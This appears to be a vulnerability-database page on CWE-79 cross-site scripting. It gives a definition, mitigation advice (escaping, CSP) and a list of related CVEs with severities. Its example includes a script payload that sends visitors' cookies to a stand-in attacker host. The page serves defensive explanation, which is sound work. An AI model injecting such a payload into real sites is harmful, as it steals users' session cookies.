Fallos del tipo CWE-79

28.976 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-3014LOWSourceCodester Simple Task Managing System cross site scriptingEPSS 0.6%CVE-2023-7316MEDIUMNagios XI < 2024R1 XSS via Graph ExplorerEPSS 0.6%CVE-2024-13992MEDIUMNagios XI < 2024R1.1 XSS via Missing Page / 404EPSS 0.6%CVE-2020-36525LOWLinking New Windows Macro cross site scriptingEPSS 0.6%CVE-2024-26068MEDIUMAdobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.6%CVE-2020-36526LOWCountdown Timer Macro cross site scriptingEPSS 0.6%CVE-2022-2690LOWSourceCodester Wedding Hall Booking System Booking Form cross site scriptingEPSS 0.6%CVE-2020-36524LOWRefined Toolkit UI-Image/UI-Button cross site scriptingEPSS 0.6%CVE-2024-26066MEDIUMAdobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.6%CVE-2024-14001MEDIUMNagios XI < 2024R1.1.3 XSS via Executive Summary ReportEPSS 0.6%CVE-2024-26053MEDIUMAdobe Experience Manager | Cross-site Scripting (DOM-based XSS) (CWE-79)EPSS 0.6%CVE-2024-24136MEDIUMThe 'Your Name' field in the Submit Score section of Sourcecodester Math Game with Leaderboard v1.0 is vulnerable to Cross-Site Scripting (XEPSS 0.6%CVE-2024-10890MEDIUMWPAdverts – Classifieds Plugin <= 2.1.7 - Reflected Cross-Site ScriptingEPSS 0.6%CVE-2021-21314MEDIUMXSS injection on ticket updateEPSS 0.6%CVE-2023-7318MEDIUMNagios XI < 2024R1.0.2 XSS via Core Command ExpansionEPSS 0.6%CVE-2023-1567LOWSourceCodester Student Study Center Desk Management System assign.php cross site scriptingEPSS 0.6%CVE-2024-26039MEDIUMAdobe Experience Manager | Cross-site Scripting (DOM-based XSS) (CWE-79)EPSS 0.6%CVE-2020-36523LOWPlantUML Database Information Macro cross site scriptingEPSS 0.6%CVE-2022-2682LOWSourceCodester Alphaware Simple E-Commerce System stockin.php cross site scriptingEPSS 0.6%CVE-2021-32539MEDIUMHundred Plus 101EIP - Stored XSS-1EPSS 0.6%